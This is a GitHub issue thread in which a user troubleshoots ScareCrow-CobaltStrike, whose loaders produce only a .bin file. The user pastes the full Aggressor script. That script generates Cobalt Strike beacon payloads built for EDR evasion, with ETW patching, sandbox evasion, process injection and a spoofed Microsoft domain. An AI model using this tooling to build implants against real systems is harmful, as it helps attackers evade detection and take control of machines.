Closed tgelliott196 closed 2 years ago
Hey, try not to change the name when saving the beacon, and let me know if that works with you
I'm not changing the name. I click listener, leave stageless (choices to pick from: binary, control, dll, excel, msiexec, or wscript); the choice to output for x86exe or x64exe is not an option. Then I leave the default domain of www.microsoft.com and click generate. It asks me for a loader name. I leave it blank because I'm not sure what to do here, and I click generate. No matter the file type I pick, minus .dll, it makes a beacon called scbeacon.bin. I thought it was supposed to generate code, an exe, create an excel doc, an msi, wscript script, or excel macro. Not sure where to go from scbeacon.bin or what to do with it. Or am I missing part of the install or something else?
Did you follow the installation guide, and install the extra packages needed to do that? Also the configuration? Share your cna script with me. Also, are you doing the excel loader from Linux?
I did a git clone, followed the readme to install.sh, and changed the config paths. Since it was an install.sh, I installed on Linux. Yes, I'm trying to do the excel loader from Linux because that is where I have CS and Scarecrow-cs installed.
```
############################################################
############################################################
$script_path = "/opt/scarecrows/ScareCrow-CobaltStrike";
$scarecrow_executable = "/opt/scarecrows/ScareCrow-CobaltStrike/ScareCrow";
$cs_directory = "/opt/cobaltstrike";
$python3 = "/usr/bin/python3";
############################################################

$loader = "";
$domain = "";
$etw = "";
$sandbox = "";
$custom_bin = "";
$loader_name = "";
$shellcode = "";
$injection = "";

menubar("ScareCrow", "scare_crow");

popup scare_crow {
    item "&Generate Payload" {
        ScareCrow();
    }
}

sub ScareCrow {
    local('$dialog %defaults');
    %defaults["domain"] = "www.microsoft.com";
    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &mainCallback);
    dialog_description($dialog, "Generate EDR evasion payloads. (#) for optional, (*) for required options.");
    drow_listener_stage($dialog, "listener", "(*) Listener: ");
    drow_file($dialog, "custom_binary", "(#) Custom x64 Shellcode: ");
    drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless"));
    drow_combobox($dialog, "architecture", "(*) Architecture: ", @("x64"));
    drow_combobox($dialog, "loader", "(*) Loader: ", @("binary", "control", "dll", "excel", "msiexec", "wscript"));
    drow_checkbox($dialog, "etw", "(#) Disable ETW patching (enabled by default)");
    drow_checkbox($dialog, "sandbox", "(#) Sandbox evasion");
    drow_text($dialog, "injection", "(#) Process Injection: ");
    drow_text($dialog, "domain", "(*) Domain: ");
    dbutton_action($dialog, "Generate Payload");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialog {
    local('$dialog %defaults');
    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &loaderDialogCallback);
    dialog_description($dialog, "Specify JScript loader name for the payload e.g. Loader.js - (**Optional For Control payloads)");
    drow_text($dialog, "loader_name", "Loader name: ");
    dbutton_action($dialog, "Generate");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialogCallback {
    $loader_name = $3["loader_name"];
    GeneratePayload();
}

sub mainCallback {
    if ($3["listener"] eq "") {
        show_message("No listener specified!");
        exit();
    }
    $loader = $3["loader"];
    $domain = $3["domain"];
    $etw = $3["etw"];
    $sandbox = $3["sandbox"];
    $custom_bin = $3["custom_binary"];
    $injection = $3["injection"];
    if ($injection ne "" && $etw eq "false"){
        show_message("Cannot use Process Injection and ETW patching together. Disable ETW patching if you want to do a Process Injection");
        exit();
    }
    if ($custom_bin ne ""){
        $shellcode_file = openf($custom_bin);
        $shellcode = readb($shellcode_file, -1);
        closef($shellcode_file);
    }else{
        $shellcode = artifact_payload($3["listener"], "raw", $3["architecture"]);
    }
    if ($loader eq "binary"){
        GeneratePayload();
    } else if ($loader eq "dll"){
        GeneratePayload();
    }else if ($loader eq "control"){
        loaderDialog();
    }else if ($loader eq "excel"){
        loaderDialog();
    }else if ($loader eq "msiexec"){
        loaderDialog();
    }else if ($loader eq "wscript"){
        loaderDialog();
    }
}

sub GeneratePayload {
    prompt_file_save("scbeacon.bin", {
        show_message("Generating payload, please wait... You can close this dialog while you wait.");
        $handle = openf(">" . $1);
        writeb($handle, $shellcode);
        closef($handle);
        $data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory . " " . $etw . " " . $sandbox . " " . $injection . " " . $loader_name);
        $pythondata = readAll($data);
        show_message("Executable saved to: " . $pythondata);
    });
}

println("\n\c9[+]\o Loaded ScareCrow.cna!");
println("\c8[!]\o \$script_path set to '\U$script_path\U'");
println("\c8[!]\o \$scarecrow_executable set to '\U$scarecrow_executable\U'");
println("\c8[!]\o \$cs_directory set to '\U$cs_directory\U'");
```
It needs Excel on your system to work.
I guess I was confused because the install file is install.sh. So, for this to work, Cobalt Strike, BASH, and MS Office need to be installed on Windows? Or will it work with LibreOffice?
Ms Office. Read your tools
Unfortunately, work only gave me the Cobalt Strike install for Linux, and Office is only compatible with win, mac, android.
On Tue, Feb 8, 2022 at 11:05 AM UserX @.***> wrote:

> Ms Office. Read your tools
So every payload is a .bin for me except the dll that doesn't work for me.
Don't know what I'm doing wrong. Installed on Kali, changed paths, loaded cna, don't know what else to do.